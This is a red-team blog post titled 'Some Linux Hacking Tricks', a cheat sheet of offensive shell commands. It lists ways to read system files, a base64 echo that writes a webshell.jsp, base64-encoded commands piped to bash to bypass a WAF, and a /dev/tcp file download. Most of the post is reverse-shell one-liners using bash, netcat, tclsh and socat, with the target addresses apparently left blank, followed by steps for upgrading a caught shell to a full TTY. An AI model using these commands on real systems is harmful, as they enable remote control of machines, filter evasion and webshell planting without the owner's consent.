Urahara's Blog

NSFOCUS M01N RedTeam Member, Co-founder of FormSec, security researcher, bug hunter, Red Teamer, pentester. Opinions are my own.

Some Linux Hacking Tricks

10 May 2018 » Pentest, Red Team


There is always a method here is useful for you to penetration test :)

Some ways to read system files

cat /etc/issue
tac /etc/issue
less /etc/issue
more /etc/issue
head /etc/issue
tail /etc/issue
nl /etc/issue
xxd /etc/issue
sort /etc/issue
uniq /etc/issue
strings /etc/issue
sed -n '1,10p' /etc/issue
grep . /etc/issue
python -c "print(open('/etc/issue').read())"
perl -F: -lane 'print "@F[0..4]\n"' /etc/issue
ruby -e 'IO.foreach("/etc/issue"){|a| print a}'
php -r "echo file_get_contents('/etc/issue');"
echo $(</etc/issue) or echo `</etc/issue`
awk '{print $0}' /etc/issue
base64 -i /etc/issue
dd count=1000 bs=1 if=/etc/issue 2>/dev/null
egrep|fgrep|rgrep|agrep "" /etc/issue
rev /etc/issue
comm /etc/issue /etc/issue
paste /etc/issue

Echo a large file to the file System

echo -n "aGVsbG8gd29ybGQK"|base64 -d > webshell.jsp

Execute commands in bash to bypass waf

# cat /etc/issue
echo Y2F0IC9ldGMvaXNzdWU=|base64 -d|bash

Download file without nc&wget

exec 5<>/dev/tcp/ip/port &&echo -e "GET /filename HTTP/1.0\n" >&5 && cat<&5 > filename

Create An Interactive Shell

# Use Bash
$ bash -i >& /dev/tcp/ 0>&1
$ exec 196<>/dev/tcp/; sh <&196 >&196 2>&196
$ exec 5<>/dev/tcp/ cat <&5 | while read line; do $line 2>&5 >&5;done
$ exec 5<>/dev/tcp/ cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done

# Use Netcat
$ nc -e /bin/sh 2333  
$ mkfifo fifo ; nc.traditional -u 5555 < fifo | { bash -i; } > fifo
$ nc 5555 -c /bin/bash
$ if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5555 > /tmp/f
$ if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc 5555 0</tmp/f|/bin/bash 1>/tmp/f
$ nc 2333|/bin/sh|nc 2444  

# Use TCHsh
$ echo 'set s [socket 5555];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh # tcp

# Use Socat
$ socat tcp-connect: exec:"bash -li",pty,stderr,setsid,sigint,sane # tcp

## Full list please read my blog
## http://reverse-tcp.xyz/2017/01/08/Some-Ways-To-Create-An-Interactive-Shell-On-Linux/

Use rlwrap to run netcat and create a listening port

# Allow the editing of keyboard input for any other command.
rlwrap -S "$(printf '\033[95mFS>\033[m ')" nc -lvvp 4444

Upgrading simple shells to fully interactive TTYs

## use Python to spawn a pty
python -c 'import pty; pty.spawn("/bin/bash")'

## Using socat
# Socat is like netcat and it can be used to pass full TTY's over TCP connections.
# If socat isn't installed, you can download id from here : https://github.com/andrew-d/static-binaries
# On Attack Host
socat file:`tty`,raw,echo=0 tcp-listen:4444 
# On Victim
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:

## Using Expect
cat sh.exp
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
# In reverse shell
expect sh.exp

## Using stty options
# In reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
# In attack shell
stty raw -echo
# In reverse shell
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

One command to locate the web path

find / -type f -name "*.*" | xargs grep "htmlstring"